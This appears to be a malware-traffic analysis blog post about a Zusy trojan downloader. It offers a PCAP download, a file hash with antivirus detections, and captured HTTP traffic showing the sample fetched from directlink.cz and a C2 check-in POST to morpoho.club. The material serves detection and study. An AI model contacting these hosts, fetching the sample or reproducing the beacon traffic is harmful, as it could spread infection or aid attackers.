Text Example

Zusy Malware Trojan Downloader Dropper PCAP file download traffic analysis POST /vad/order.php?page=106 morpoho.club

Posted on by admin

Download Attachments

  • 1 pcap 8848
    Date added: May 15, 2017 2:40 am Added by: admin File size: 63 KB Downloads: 87

SHA256:     3977145723a78e6c2f70a2c5b05cc21e0f3a7552f66ae8223ed67c614819e6a4
File name:     8848275c18.exe
Detection ratio:     42 / 60
Analysis date:     2017-05-14 22:16:11 UTC ( 0 minutes ago )

Ad-Aware     Gen:Variant.Zusy.236832     20170514
AegisLab     Backdoor.W32.Androm!c     20170514
Antiy-AVL     Trojan[Backdoor]/Win32.Androm     20170514
Arcabit     Trojan.Zusy.D39D20     20170514
Avast     Win32:Malware-gen     20170514
AVG     Inject3.CMBE     20170514
Avira (no cloud)     TR/Dropper.Gen     20170514
AVware     Trojan.Win32.Generic!BT     20170514
Baidu     Win32.Trojan.WisdomEyes.16070401.9500.9986     20170503
BitDefender     Gen:Variant.Zusy.236832     20170514
Bkav     HW32.Packed.6A39     20170513
CrowdStrike Falcon (ML)     malicious_confidence_100% (W)     20170130
DrWeb     Trojan.Inject2.53489     20170514
Emsisoft     Gen:Variant.Zusy.236832 (B)     20170514
Endgame     malicious (high confidence)     20170503
ESET-NOD32     a variant of Win32/Injector.DOEX     20170514
F-Secure     Gen:Variant.Zusy.236832     20170514
Fortinet     W32/Androm.DOEX!tr.bdr

 

2017-05-14 21:39:18.826218 IP 192.168.1.102.58272 > 104.27.190.41.80: Flags [P.], seq 0:410, ack 1, win 256, length 410: HTTP: GET /download/8848275c18.exe HTTP/1.1
E…{.@……..fh..)…Pm.K.T.q7P….K..GET /download/8848275c18.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: directlink.cz
Connection: Keep-Alive

2017-05-14 21:39:30.280665 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [P.], seq 0:300, ack 1, win 256, length 300: HTTP: POST /vad/order.php?page=106 HTTP/1.1
E..T..@…C_…f..@….P….a>4(P…_…POST /vad/order.php?page=106 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: morpoho.club
Content-Length: 964
Cache-Control: no-cache

2017-05-14 21:39:30.553845 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [P.], seq 300:1264, ack 1, win 256, length 964: HTTP
E…..@…@….f..@….P….a>4(P….S..zyxwv=90f7e415a23ea48f3ca805f15a18dee69f&xurolifcz=63894569&bcdefgh=70F4990E4D2E32B7A5043C793383B2D4A4E0BE94CEAB7E6FFDA99B7FE5EF4B7B60C32C08DDBF02E4D61459E031A80E30402DAB7
1A5347429ABFA3D7EA44A94470D355070D15BA49CF46BD1005965CE8348B1018F0486FC5FF983905FC8FFA30EF38AD4B07F717E9B4DABCA6BFF6AD6598A7F3B6489ACFF37C666A3033CBEDFE8B65C019EFCF70723F66531A6A58E779C3B29801E4F137A20B91D8468BD
37687FBA04546C&dgjmpsvyb1=61F04BC27EF021C250F01EC245F003C243F01CC266F010C256F010C27EF01CC246F01FC251F02DC24FF006C254F010C258F005C25BF013C256F05FC247F009C247F0&dgjmpsvyb2=4BF014C25AF001C24EF01EC250F014C20CF014C25
AF014C2&dgjmpsvyb3=75F038C26CF05CC264F046C212F046C214F03AC276F020C213F021C217F02DC250F008C216F006C24CF0&dgjmpsvyb4=6BF01FC256F014C24EF059C270F058C202F032C24DF003C247F059C276F03CC20BF043C202F020C257F010C246F051C2
61F021C277F051C202F051C202F020C21AF042C212F041C202F051C262F051C210F05FC217F041C265F039C258F0&dgjmpsvyb5=74F03CC255F010C250F014C202F022C274F036C263F051C211F035C2
2017-05-14 21:39:30.912164 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [.], ack 287, win 255, length 0
E..(..@…D….f..@….P….a>5FP….=……..

Leave a Reply